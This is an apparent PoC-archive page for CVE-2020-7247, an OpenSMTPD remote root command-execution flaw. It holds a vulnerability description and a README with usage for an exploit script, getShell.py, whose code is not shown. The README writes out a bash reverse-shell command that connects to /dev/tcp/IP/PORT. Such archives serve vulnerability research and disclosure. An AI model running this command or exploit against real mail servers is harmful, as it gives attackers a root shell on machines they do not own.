Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2020-7247 PoC — Openbsd Opensmtpd代码问题漏洞

Source
Associated Vulnerability
Title:Openbsd Opensmtpd代码问题漏洞 (CVE-2020-7247)
Description:Openbsd Opensmtpd是Openbsd组织的一个基于RFC 5321的SMTP服务端软件。 Openbsd Opensmtpd 存在代码问题漏洞。远程攻击者可通过特制的SMTP session利用该漏洞以root权限执行任意命令。
Description
This vulnerability exists in OpenBSD’s mail server OpenSMTPD’s “smtp_mailaddr()” function, and affects OpenBSD version 6.6. This allows an attacker to execute arbitrary shell commands like “sleep 66” as root user
Readme
# CVE-2020-7247

This vulnerability exists in OpenBSD’s mail server OpenSMTPD’s “smtp_mailaddr()” function, and affects OpenBSD version 6.6. This allows an attacker to execute arbitrary shell commands like “sleep 66” as root user


### How to use?

```python3 getShell.py <targetIp> <targetPort> <command>```


If you need a reverse shell then run it like this

```python3 getShell.py <TargetIp> <TargetPort> 'bash -c "exec bash -i &> /dev/tcp/IP/PORT <&1"'```


## Important

Change some stuffs in this exploit like RCPT to and something(if needed)



See this article for more clear explaination

https://blog.firosolutions.com/exploits/opensmtpd-remote-vulnerability/
File Snapshot

[4.0K] /data/pocs/a68b95572f2cb6ace26ce0179e8127fff4dfe9d1 ├── [1.5K] getShell.py └── [ 683] README.md 0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.